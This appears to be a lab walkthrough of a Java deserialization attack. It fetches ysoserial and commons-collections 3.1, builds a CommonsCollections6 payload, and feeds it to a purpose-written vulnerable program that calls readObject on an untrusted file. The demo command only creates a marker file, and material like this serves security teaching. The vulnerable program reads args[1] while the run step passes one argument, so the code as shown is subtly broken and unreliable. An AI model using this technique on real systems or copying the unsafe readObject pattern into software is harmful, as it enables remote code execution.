Skip to content

Java Deserializer (example 1)

Setup

get externals

wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

machine configuration - select java 11

sudo update-alternatives --config java
sudo update-alternatives --config javac

create payload

echo "touch /tmp/pwned-by-java.txt" > exploit.sh

java -jar ysoserial-all.jar CommonsCollections6 "/tmp/exploit.sh" > payload.ser

cp ./exploit.sh /tmp
cp ./payload.ser /tmp/

chmod +x /tmp/exploit.sh
chmod +x /tmp/payload.ser

Create example app

DeSerializingObject.java 

import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class DeSerializingObject {

    public static void main(String[] args) {

        Employee employeeInput = null;
        FileInputStream fis = null;
        ObjectInputStream ois = null;

        try {
            fis = new FileInputStream(args[1]);
            ois = new ObjectInputStream(fis);
            employeeInput = (Employee)ois.readObject();
            System.out.println("Serialized data is restored from Employee.ser file");
            ois.close();
            fis.close();
        } catch (IOException | ClassNotFoundException e) {
            e.printStackTrace();
        } 

        System.out.println("Name of employee is : " + employeeInput.getSerializeValueName());
        System.out.println("Salary of employee is : " + employeeInput.getNonSerializeValueSalary());

    }
}

Employee.java 

import java.io.Serializable;

public class Employee implements Serializable {

    private static final long serialVersionUID = 1L;
    private String serializeValueName;
    private transient int nonSerializeValueSalary;

    public String getSerializeValueName() {
        return serializeValueName;
    }

    public void setSerializeValueName(String serializeValueName) {
        this.serializeValueName = serializeValueName;
    }

    public int getNonSerializeValueSalary() {
        return nonSerializeValueSalary;
    }

    public void setNonSerializeValueSalary(int nonSerializeValueSalary) {
        this.nonSerializeValueSalary = nonSerializeValueSalary;
    }

    @Override
    public String toString() {
        return "Employee [serializeValueName=" + serializeValueName + "]";
    }

}

Compilation

javac Employee.java
javac DeSerializingObject.java

Exploitation

java -classpath .:commons-collections-3.1.jar DeSerializingObject "/tmp/payload.ser"

you should be able to find pwned-by-java.txt file in /tmp directory as proof